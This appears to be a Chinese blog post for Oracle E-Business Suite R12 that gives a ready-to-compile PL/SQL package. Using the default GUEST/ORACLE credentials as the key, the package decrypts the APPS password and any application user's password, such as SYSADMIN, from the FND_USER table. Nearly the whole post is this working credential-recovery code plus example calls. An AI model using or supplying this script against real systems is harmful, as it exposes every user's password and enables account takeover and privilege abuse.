Oracle EBS R12 - 利用PLSQL取得/破解apps密码和EBS中的用户密码

本文介绍了如何在Oracle E-Business Suite (EBS) R12.0.6/R12.1.1版本中,利用PLSQL来获取和处理EBS系统内GUEST用户的密码。默认情况下,GUEST用户的密码为ORACLE,具体密码信息存储在$CONTEXT_FILE配置文件中。用户可以通过查看此文件并编译特定的package及调用函数来操作密码。

版本:Tested on R12.0.6/R12.1.1


注意:请根据具体环境调整GUEST用户密码,默认情况都是ORACLE。 GUEST用户的密码可以在$CONTEXT_FILE文件中找到:

view $CONTEXT_FILE

     51          <oa_user type="GUEST">
     52             <username oa_var="s_guest_user">GUEST</username>
     53             <password oa_var="s_guest_pass">ORACLE</password>
     54          </oa_user>


用法:编译package,调用函数即可。

CREATE OR REPLACE PACKAGE apps.xxdba_fnd_security
   AUTHID CURRENT_USER
AS
   -- guest login can be retrieved from profile GUEST_USER_PWD(Guest User Password) or $CONTEXT_FILE
   FUNCTION get_user_pass (p_fnd_user        IN VARCHAR2
                          ,p_guest_login     IN VARCHAR2 DEFAULT 'GUEST/ORACLE')
      RETURN VARCHAR2;
   FUNCTION get_apps_pass (p_guest_login IN VARCHAR2 DEFAULT 'GUEST/ORACLE')
      RETURN VARCHAR2;
   FUNCTION encrypt (key            IN VARCHAR2
                    ,VALUE          IN VARCHAR2)
      RETURN VARCHAR2;
   FUNCTION decrypt (key            IN VARCHAR2
                    ,VALUE          IN VARCHAR2)
      RETURN VARCHAR2;
END xxdba_fnd_security;
/

CREATE OR REPLACE PACKAGE BODY apps.xxdba_fnd_security
AS
   FUNCTION encrypt (
      key            IN VARCHAR2
     ,VALUE          IN VARCHAR2)
      RETURN VARCHAR2
   AS
      LANGUAGE JAVA
      NAME 'oracle.apps.fnd.security.WebSessionManagerProc.encrypt(java.lang.String,java.lang.String) return java.lang.String';
   FUNCTION decrypt (
      key            IN VARCHAR2
     ,VALUE          IN VARCHAR2)
      RETURN VARCHAR2
   AS
      LANGUAGE JAVA
      NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';

   FUNCTION get_apps_pass (p_guest_login IN VARCHAR2 DEFAULT 'GUEST/ORACLE')
      RETURN VARCHAR2
   IS
      l_apps_encrypted_pass VARCHAR2 (200);
      l_apps_decrypted_pass VARCHAR2 (200);
   BEGIN
      -- get apps encrypted pass
      SELECT encrypted_foundation_password
      INTO   l_apps_encrypted_pass
      FROM   apps.fnd_user
      WHERE  user_name = 'GUEST';

      --decrypt apps pass
      SELECT decrypt (p_guest_login
                     ,l_apps_encrypted_pass)
      INTO   l_apps_decrypted_pass
      FROM   DUAL;
      
      RETURN l_apps_decrypted_pass;
   END get_apps_pass;

   FUNCTION get_user_pass (p_fnd_user      IN VARCHAR2
                          ,p_guest_login   IN VARCHAR2 DEFAULT 'GUEST/ORACLE')
      RETURN VARCHAR2
   IS
      l_user_encrypted_pass VARCHAR2 (200);
      l_user_decrypted_pass VARCHAR2 (200);
   BEGIN
      -- get fnd user encrypted pass
      BEGIN
         SELECT encrypted_user_password
         INTO   l_user_encrypted_pass
         FROM   fnd_user
         WHERE  user_name = p_fnd_user;
      EXCEPTION
         WHEN NO_DATA_FOUND
         THEN
            RETURN 'User ' || p_fnd_user || ' is not exist in FND_USER table';
      END;
      
      --decrypt user pass
      SELECT decrypt (get_apps_pass (p_guest_login)
                     ,l_user_encrypted_pass)
      INTO   l_user_decrypted_pass
      FROM   DUAL;

      RETURN l_user_decrypted_pass;
   END get_user_pass;

END xxdba_fnd_security;
/

/*
select xxdba_fnd_security.get_user_pass('SYSADMIN') from dual;

select xxdba_fnd_security.get_apps_pass from dual;

drop package apps.xxdba_fnd_security;
*/


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值